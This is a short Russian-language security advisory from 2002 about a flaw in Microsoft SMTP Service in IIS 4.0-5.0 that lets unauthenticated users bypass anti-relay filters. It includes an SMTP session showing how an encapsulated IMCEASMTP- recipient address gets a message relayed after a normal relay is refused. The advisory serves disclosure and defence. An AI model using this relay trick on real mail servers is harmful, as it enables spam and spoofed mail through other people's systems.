Security Lab

Ретрансляция почтовых сообщений в Microsoft SMTP Service в IIS 4.0-5.0

Дата публикации:15.07.2002
Всего просмотров:1559
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Обнаруженная уязвимость в Microsoft SMTP Service, включенным с IIS 4.0-5.0, позволяет удаленному пользователю без авторизации посылать любые почтовые сообщения в обход существующих “anti-relay” фильтров. Изначально уязвимость была обнаружена Лауреном Фринкином и воздействовала на Microsoft Exchange 5.5 до SP2 с SP2 IMC заплатой.

Пример:

220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready 
at Tue, 28 May 2002 14:54:10 +0100
helo
250 test-mailer Hello [IP address of source host]
MAIL FROM: test@test.com
250 2.1.0 test@test.com....Sender OK
RCPT TO: test2@test.com
550 5.7.1 Unable to relay for test@test.com
RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk
250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk
data
354 Start mail input; end with <CRLF>.<CRLF>
Subject: You are vulnerable.
уязвимость обнаружена в IIS 4.0 - 5.0
Ссылки: IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability